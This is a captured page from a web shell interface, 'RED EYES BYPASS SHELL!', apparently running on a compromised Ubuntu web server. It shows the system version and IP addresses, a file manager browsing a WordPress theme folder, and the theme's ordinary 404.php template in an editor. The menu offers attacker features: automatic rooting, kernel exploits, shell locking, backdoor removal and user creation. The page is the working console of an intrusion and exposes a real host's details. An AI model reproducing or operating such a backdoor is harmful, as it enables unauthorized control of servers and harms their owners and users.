Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
blossom-spa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
build
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sections
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
896
B
-rwxr-xr-x
archive.php
1.26
KB
-rwxr-xr-x
comments.php
1.62
KB
-rwxr-xr-x
footer.php
1009
B
-rwxr-xr-x
front-page.php
600
B
-rwxr-xr-x
functions.php
2.3
KB
-rwxr-xr-x
header.php
1.18
KB
-rwxr-xr-x
index.php
1.37
KB
-rwxr-xr-x
page.php
933
B
-rwxr-xr-x
readme.txt
11.18
KB
-rwxr-xr-x
rtl.css
24.5
KB
-rwxr-xr-x
screenshot.png
198.97
KB
-rwxr-xr-x
search.php
1.25
KB
-rwxr-xr-x
sidebar.php
449
B
-rwxr-xr-x
single-blossom-portfolio.php
2.29
KB
-rwxr-xr-x
single.php
955
B
-rwxr-xr-x
style.css
176.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 404.php
<?php /** * The template for displaying 404 pages (not found) * * @package Blossom_Spa */ get_header(); ?> <div id="primary" class="content-area"> <main id="main" class="site-main"> <section class="error-404 not-found"> <p class="error-text"><?php esc_html_e( 'The page you are looking for may have been moved, deleted, or possibly never existed.', 'blossom-spa' ); ?></p> <div class="error-num"><?php esc_html_e( '404','blossom-spa' ); ?></div> <a class="bttn" href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php esc_html_e( 'Take me to the home page', 'blossom-spa' ); ?></a> <?php get_search_form(); ?> </section><!-- .error-404 --> <?php /** * @see blossom_spa_latest_posts */ do_action( 'blossom_spa_latest_posts' ); ?> </main><!-- #main --> </div><!-- #primary --> <?php get_footer();
Close